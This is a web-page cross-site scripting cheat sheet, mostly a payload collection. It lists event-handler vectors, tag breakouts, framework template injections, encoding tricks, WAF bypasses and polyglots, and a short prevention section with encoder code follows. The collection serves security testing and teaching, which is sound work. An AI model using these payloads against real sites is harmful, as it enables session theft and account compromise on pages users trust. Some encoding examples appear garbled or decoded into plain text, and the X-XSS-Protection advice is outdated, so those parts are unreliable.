Understanding and Preventing Cross-Site Scripting (XSS Cheat Sheet)

Cross-Site Scripting (XSS) represents one of the most prevalent and dangerous vulnerabilities in modern web applications. Understanding XSS is crucial for developers who want to build secure, robust applications that protect both their users and their business.

🛡️ Complete XSS Cheat Sheet

Covers 500+ XSS vectors, 50+ event handlers, 25+ bypass techniques and 10+ framework payloads.

⚡ Event Handlers – Auto Execute

Event handlers that execute automatically without user interaction

💡 Pro Tip: These event handlers are ideal for XSS attacks as they don’t require user interaction to trigger.
onload – Element Loaded
<body onload=alert(1)>
<img src=x onload=alert(1)>
<iframe onload=alert(1)></iframe>
onerror – Error Handling
<img src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>
<video src=x onerror=alert(1)>
onfocus (autofocus) – Auto Focus
<input onfocus=alert(1) autofocus>
<select onfocus=alert(1) autofocus></select>
<textarea onfocus=alert(1) autofocus></textarea>
SVG Animation Events
<svg><animate onbegin=alert(1) attributeName=x dur=1s></animate>
<svg><animate onend=alert(1) attributeName=x dur=1s></animate>
<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2></animate>
CSS Animation Events
<style>@keyframes x{}</style><div style="animation-name:x" onanimationend="alert(1)"></div>
<style>@keyframes x{}</style><div style="animation-name:x" onanimationstart="alert(1)"></div>
Details Toggle
<details ontoggle=alert(1) open>test</details>
<details open ontoggle=alert(1)><summary>Click</summary>XSS</details>

👆 Event Handlers – User Interaction Required

Event handlers that require user interaction to trigger

⚠️ Note: These payloads require user interaction (click, hover, key press, etc.) to execute.
onclick – Click Events
<div onclick="alert(1)" style="cursor:pointer">Click me</div>
<button onclick="alert(1)">XSS</button>
<a href="#" onclick="alert(1)">Click</a>
onmouseover – Hover Events
<div onmouseover="alert(1)" style="width:100px;height:100px;background:red"></div>
<img src=x onmouseover="alert(1)">
<a onmouseover="alert(1)">Hover me</a>
Keyboard Events
<input onkeydown="alert(1)" placeholder="Type here">
<textarea onkeyup="alert(1)"></textarea>
<div contenteditable onkeypress="alert(1)">Type here</div>
Form Events
<form onsubmit=alert(1)><input type=submit></form>
<input onchange=alert(1) value="change me">
<input oninput=alert(1) placeholder="Type here">
Drag and Drop Events
<div draggable="true" ondrag="alert(1)">Drag me</div>
<div ondrop="alert(1)" ondragover="event.preventDefault()">Drop here</div>
Context Menu Events
<div oncontextmenu="alert(1)">Right click me</div>
<input onauxclick="alert(1)" value="Middle click">

🔄 Consuming Tags

Tags whose content is parsed as raw text up to their closing tag, useful for escaping contexts

💡 Usage: The HTML tokenizer treats the content of these elements as raw text, so the first matching closing tag ends the element even when it appears inside a quoted attribute value. That is what makes them useful for breaking out of attribute contexts.
Script Consuming
<script><img title="</script><img src onerror=alert(1)>"></script>
Style Consuming
<style><img title="</style><img src onerror=alert(1)>"></style>
Textarea Consuming
<textarea><img title="</textarea><img src onerror=alert(1)>"></textarea>
Title Consuming
<title><img title="</title><img src onerror=alert(1)>"></title>
Noscript Consuming
<noscript><img title="</noscript><img src onerror=alert(1)>"></noscript>
Iframe Consuming
<iframe><img title="</iframe><img src onerror=alert(1)>"></iframe>

🔗 JavaScript Protocols

Using the javascript: protocol in various contexts

Basic JavaScript Protocol
<a href="javascript:alert(1)">XSS</a>
<iframe src="javascript:alert(1)"></iframe>
<object data="javascript:alert(1)"></object>
Case Insensitive Protocol
<a href="JaVaScript:alert(1)">XSS</a>
<a href="JAVASCRIPT:alert(1)">XSS</a>
Protocol with Whitespace
<a href=" javascript:alert(1)">XSS</a>
<a href="javascript :alert(1)">XSS</a>
SVG with XLink
<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a></svg>
Data Protocol
<script src="data:text/javascript,alert(1)"></script>
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>
Form Actions
<form action="javascript:alert(1)"><input type="submit"></form>
<input type="submit" formaction="javascript:alert(1)" value="XSS">

⚛️ Framework Template Injections

Client-side template injection payloads for popular frameworks

Vue.js Payloads

  • Version 2: {{constructor.constructor('alert(1)')()}}
  • Version 2: {{_c.constructor('alert(1)')()}}
  • Version 3: {{_openBlock.constructor('alert(1)')()}}
  • Version 3: {{$emit.constructor`alert(1)`()}}

AngularJS Payloads

  • v1.0.1-1.1.5: {{constructor.constructor('alert(1)')()}}
  • v1.2.0-1.2.1: Complex prototype chain exploit
  • v1.6.0+: {{$on.constructor('alert(1)')()}}
  • CSP Bypass: ng-focus with orderBy filter

React JSX Injection

  • dangerouslySetInnerHTML prop
  • Server-side rendering vulnerabilities
  • Props injection through URL parameters
Vue.js v2 Basic
{{constructor.constructor('alert(1)')()}}
{{_c.constructor('alert(1)')()}}
<div v-html="'<script>alert(1)</script>'"></div>
Vue.js v3 Advanced
{{_openBlock.constructor('alert(1)')()}}
{{_createVNode.constructor('alert(1)')()}}
<teleport to="script">alert(1)</teleport>
AngularJS Modern
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
AngularJS CSP Bypass
<input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">

🔐 Encoding & Obfuscation

Various encoding techniques to bypass filters

💡 Pro Tip: Encoding techniques can help bypass weak input sanitization and Web Application Firewalls (WAFs).
Unicode Escapes
<script>\u0061lert(1)</script>
<script>\u{61}lert(1)</script>
<script>\u{0000000061}lert(1)</script>
Hex Encoding
<script>eval('\x61lert(1)')</script>
<a href="javascript:alert(1)">XSS</a>
Octal Encoding
<script>eval('\141lert(1)')</script>
<script>eval('alert(\061)')</script>
<script>eval('alert(\61)')</script>
Base64 Encoding
<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>
HTML Entities
<img src=x onerror=alert('XSS')>
<a href="javascript:alert(1)">XSS</a>
<a href="java script:alert(1)">XSS</a>
URL Encoding
<a href="javascript:x='%27-alert(1)-%27';">XSS</a>
%3Cscript%3Ealert(1)%3C/script%3E
Double URL Encoding
%253Cscript%253Ealert(1)%253C/script%253E
<a href="javascript:%2561lert(1)">XSS</a>
Mixed Encoding
<script>eval('\u0061l\x65rt(1)')</script>
<script>eval('\141l\x65rt(1)')</script>

🔥 WAF Bypass Techniques

Advanced methods to bypass Web Application Firewalls

⚠️ Advanced Techniques: These methods are designed to bypass modern security filters and WAFs.
No Parentheses – Exception Handling
<script>onerror=alert;throw 1</script>
<script>{onerror=alert}throw 1</script>
<script>throw onerror=alert,1</script>
Template Literals
<script>alert`1`</script>
<script>eval`alert\x281\x29`</script>
<script>setTimeout`alert\x281\x29`</script>
Constructor Tricks
<script>[].constructor.constructor('alert(1)')()</script>
<script>"".constructor.constructor('alert(1)')()</script>
<script>({}).constructor.constructor('alert(1)')()</script>
String Concatenation
<script>window['ale'+'rt'](1)</script>
<script>self['al'+'ert'](1)</script>
<script>top['aler'+'t'](1)</script>
RegExp Source Property
<script>window[/al/.source+/ert/.source](1)</script>
<script>self[/al/.source+/ert/.source](1)</script>
Location Redirect
<script>location='javascript:alert\x281\x29'</script>
<script>location=name</script>

🎭 Polyglot Payloads

Universal payloads that work in multiple contexts

💡 Polyglots: These payloads are designed to work across multiple contexts and bypass various filters simultaneously.
Universal Polyglot 1
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/+"/onmouseover=1/+/[*/[]/+alert(1)//>
Universal Polyglot 2
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
Multi-Context Polyglot
" onclick=alert(1)//" onmouseover="alert(1)//" autofocus onfocus=alert(1)//
Attribute Context Polyglot
' onclick='alert(1)' style='position:absolute;left:0;top:0;width:5000px;height:5000px;' '

🚫 Restricted Characters Bypass

Techniques for bypassing character restrictions

No Parentheses Using ES6
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
<script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>
Without Greater Than
<svg onload=alert(1)
<svg onload=alert(1)<!--
Destructuring Assignment
<script>throw[onerror]=[alert],1</script>
<script>var{a:onerror}={a:alert};throw 1</script>
Using Window.name
<script>window.name='javascript:alert(1)';</script><svg onload=location=name>

📱 Mobile & Modern Browsers

XSS vectors specific to mobile devices and modern browsers

Touch Events (Mobile)
<body ontouchstart=alert(1)>
<body ontouchmove=alert(1)>
<body ontouchend=alert(1)>
WebKit Specific
<style>@keyframes x{}</style><div style="animation-name:x" onwebkitanimationend="alert(1)"></div>
<video controls src=x onwebkitfullscreenchange=alert(1)></video>
Modern CSS Features
<div oncontentvisibilityautostatechange=alert(1) style=display:block;content-visibility:auto></div>
<div onscrollsnapchange=alert(1) style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>test</div></div>
Import Statement
<script>import('data:text/javascript,alert(1)')</script>
<script type="module">import('data:text/javascript,alert(1)')</script>

🛠️ Testing & Tools

Tools and techniques for XSS testing

Professional Tools

  • Burp Suite Professional
  • OWASP ZAP
  • XSSHunter for Blind XSS
  • BeEF (Browser Exploitation Framework)
  • XSSer – Automated XSS detection

Browser Extensions

  • XSS Rays (Chrome)
  • Hack-Tools
  • Wappalyzer
  • Cookie Editor
  • User-Agent Switcher

Online Resources

  • PortSwigger Web Security Academy
  • OWASP XSS Filter Evasion
  • PayloadsAllTheThings GitHub
  • HackerOne Disclosed Reports
  • XSS Game by Google

Testing Methodology

  • Input validation testing
  • Context-aware payload selection
  • Filter bypass techniques
  • Blind XSS detection
  • Manual verification of findings

🛡️ Prevention & Mitigation

Best practices for preventing XSS vulnerabilities

🔒 Defense in Depth: Combine multiple prevention techniques for maximum security.

Input Validation

  • Whitelist-based validation
  • Strict data type checking
  • Length restrictions
  • Format validation (regex)
  • Business logic validation

Output Encoding

  • HTML context encoding
  • JavaScript context encoding
  • CSS context encoding
  • URL context encoding
  • Context-aware sanitization

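The encoders below are an added example, not code from the cheat sheet. They show one encoder per output context from the list above, why JSON inside a script block also needs the "consuming tags" case handled, and why a user-supplied URL (the javascript: protocol variants earlier on the page) needs a scheme allow-list rather than encoding; the function names and the base origin https://example.com/ are assumptions made here.

```javascript
// Added example: one encoder per output context. The entity, data: and
// javascript: payloads above survive blocklists because they are the same
// characters spelled differently; encoding for the exact context, and
// allow-listing URL schemes, does not care how the attacker spelled them.

// HTML text and quoted-attribute context: entity-encode the five metacharacters.
// Attributes must also be quoted, or onfocus=alert(1) needs no quote to break out.
function encodeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Data embedded in a <script> block: JSON.stringify alone is not enough, because
// the HTML tokenizer treats script content as raw text and ends the element at
// the first "</script>" no matter how the JS string is quoted (the "consuming
// tags" trick). Escape < > & and the JS line terminators U+2028/U+2029 as \uXXXX.
function encodeForScript(value) {
  return JSON.stringify(value).replace(/[<>&\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// URL query context: percent-encode the value and place it only in the query,
// never as the whole href.
function safeHref(path, param, value) {
  return `${path}?${encodeURIComponent(param)}=${encodeURIComponent(value)}`;
}

// When the user really supplies a whole URL, encoding cannot help: "javascript:"
// is a scheme, not a metacharacter. The WHATWG URL parser already lowercases the
// scheme and strips leading whitespace and embedded tab/newline, so parse first
// and allow-list the result. The base origin is an assumed value.
function isSafeUrl(url, base = 'https://example.com/') {
  try {
    const { protocol } = new URL(String(url), base);
    return protocol === 'https:' || protocol === 'http:' || protocol === 'mailto:';
  } catch {
    return false;
  }
}
```
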
Content Security Policy

  • default-src 'self'
  • script-src with nonces
  • object-src 'none'
  • base-uri 'self'
  • report-uri for monitoring

Security Headers

  • X-Content-Type-Options: nosniff
  • X-Frame-Options: DENY
  • X-XSS-Protection: 1; mode=block
  • Referrer-Policy: strict-origin
  • Permissions-Policy
Example CSP Header
Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-random123'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; object-src 'none'; base-uri 'self'; form-action 'self'; report-uri /csp-report;

⚠️ Legal and Ethical Disclaimer

This XSS cheat sheet is provided for educational and authorized security testing purposes only.

  • Always obtain proper written authorization before testing any systems
  • Unauthorized testing is illegal and unethical
  • Use these techniques only on systems you own or have explicit permission to test
  • Respect responsible disclosure practices when reporting vulnerabilities
  • Follow your organization’s security testing policies
